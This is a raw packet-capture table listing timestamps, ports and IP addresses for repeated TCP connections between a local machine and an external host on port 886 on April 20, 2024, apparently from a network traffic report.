Apr 20, 2024 15:21:55.941277027 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941301107 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941314936 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941319942 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941354036 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941386938 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941392899 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941406965 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941431046 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941450119 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941471100 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941488028 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941509962 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941528082 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941549063 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941569090 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941590071 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941611052 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941627979 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941652060 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941665888 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941682100 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941704988 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941720009 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941742897 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941761971 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941782951 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941798925 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941821098 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941838026 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941862106 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941883087 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941905022 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.243792057 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.243848085 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.243886948 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.243891954 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.243925095 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.243928909 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.243951082 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.243968964 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.243978977 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.244008064 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.244035959 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.244071960 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.246762991 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.246802092 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.246834993 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.246874094 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.246911049 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.246957064 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.246974945 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.246995926 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247009039 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247034073 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247050047 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247072935 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247092009 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247111082 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247132063 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247163057 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247184038 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247205019 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247232914 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247242928 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247262955 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247282028 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247296095 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247319937 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247353077 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247359991 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247373104 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247399092 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247416019 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247437954 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247451067 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247476101 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247497082 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247514963 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247529030 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247555017 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247575045 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247596025 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247606039 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247633934 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247649908 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247672081 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247693062 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247709990 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247720957 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247747898 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247769117 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247785091 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247805119 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247834921 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247844934 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247874022 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247889996 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247914076 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247936010 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247951984 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.247972012 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.247991085 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248028040 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248032093 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248044968 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248070002 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248085976 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248127937 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248130083 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248167992 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248193979 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248212099 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248234034 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248250961 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248271942 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248289108 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248303890 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248326063 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248342037 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248363972 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248380899 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248402119 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248420954 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248439074 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248471022 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248477936 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248501062 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248516083 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248528004 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248553991 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248574972 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248594046 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248610973 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248631001 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248645067 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248670101 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248688936 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248708963 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248728037 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248747110 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248769999 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248784065 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248805046 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248821974 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248845100 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248861074 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248877048 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248898029 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248919010 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248936892 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248958111 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.248975039 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.248996019 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249012947 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249032974 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249049902 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249082088 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249088049 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249104023 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249125957 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249142885 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249166012 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249185085 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249203920 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249222040 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249242067 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249263048 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249280930 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249298096 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249319077 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249341011 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249356985 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249383926 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249394894 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249416113 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249433994 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249456882 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249474049 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249492884 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249511957 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249527931 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249551058 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249582052 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249589920 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249605894 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249628067 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249643087 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249666929 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249686003 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249705076 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249720097 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249742985 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249764919 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249780893 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249803066 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249819040 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249842882 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249855995 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249865055 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249896049 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249913931 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249936104 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249958038 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.249974012 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.249999046 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250013113 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250030994 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250051975 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250072002 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250092983 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250113010 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250129938 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250153065 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250166893 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250195026 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250206947 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250219107 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250245094 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250266075 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250284910 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250300884 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250323057 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250344038 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250360966 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250380039 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250400066 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250418901 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250437975 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250457048 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250477076 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250498056 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250514984 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250533104 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250552893 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250572920 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250592947 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250613928 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250631094 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250652075 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250670910 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250701904 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250716925 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.250725985 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.250771046 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.251918077 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.257586002 CEST	49707	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.556474924 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.597026110 CEST	886	49707	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.597155094 CEST	49707	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.597330093 CEST	49707	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:56.938106060 CEST	886	49707	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.940998077 CEST	886	49707	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:56.941116095 CEST	49707	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:57.641341925 CEST	886	49707	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:57.641519070 CEST	49707	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:58.697153091 CEST	886	49707	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:58.697284937 CEST	49707	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:58.697457075 CEST	49707	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:58.819035053 CEST	49708	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:59.038990974 CEST	886	49707	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:59.829267025 CEST	49708	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.156529903 CEST	886	49708	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:00.156634092 CEST	49708	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.156812906 CEST	49708	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.495770931 CEST	886	49708	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:00.501425982 CEST	886	49708	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:00.501492977 CEST	886	49708	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:00.501719952 CEST	49708	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.501719952 CEST	49708	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.501807928 CEST	49708	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.614141941 CEST	49709	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.817668915 CEST	886	49708	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:00.942034960 CEST	886	49709	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:00.942198992 CEST	49709	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:00.942385912 CEST	49709	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:01.256628990 CEST	886	49709	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:01.259191036 CEST	886	49709	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:01.259253025 CEST	886	49709	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:01.259303093 CEST	49709	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:01.259371996 CEST	49709	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:01.259505987 CEST	49709	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:01.381325006 CEST	49710	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:01.574949026 CEST	886	49709	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:01.729969978 CEST	886	49710	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:01.730070114 CEST	49710	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:01.730314970 CEST	49710	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.078846931 CEST	886	49710	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.081738949 CEST	886	49710	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.081804991 CEST	886	49710	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.081820011 CEST	49710	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.081864119 CEST	49710	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.082020044 CEST	49710	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.191103935 CEST	49711	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.430782080 CEST	886	49710	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.506069899 CEST	886	49711	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.506288052 CEST	49711	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.506584883 CEST	49711	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.821484089 CEST	886	49711	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.824739933 CEST	886	49711	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.824807882 CEST	886	49711	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:02.824841022 CEST	49711	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.824870110 CEST	49711	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.825069904 CEST	49711	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:02.943489075 CEST	49712	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:03.140429974 CEST	886	49711	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:03.257554054 CEST	886	49712	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:03.257669926 CEST	49712	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:03.257862091 CEST	49712	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:03.569358110 CEST	886	49712	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:03.572482109 CEST	886	49712	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:03.572551012 CEST	886	49712	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:03.572565079 CEST	49712	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:03.572597027 CEST	49712	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:03.572719097 CEST	49712	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:03.691859007 CEST	49713	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.007216930 CEST	886	49713	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:04.010246992 CEST	49713	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.010247946 CEST	49713	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.323493958 CEST	886	49713	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:04.326760054 CEST	886	49713	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:04.326828003 CEST	886	49713	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:04.326848030 CEST	49713	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.326879978 CEST	49713	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.327014923 CEST	49713	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.344667912 CEST	49712	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.478274107 CEST	49714	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.641676903 CEST	886	49713	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:04.658727884 CEST	886	49712	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:04.782953024 CEST	886	49714	118.89.125.171	192.168.2.5
Apr 20, 2024 15:22:04.783397913 CEST	49714	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:04.783399105 CEST	49714	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:22:05.085547924 CEST	886	49714	118.89.125.171	192.168.2.5
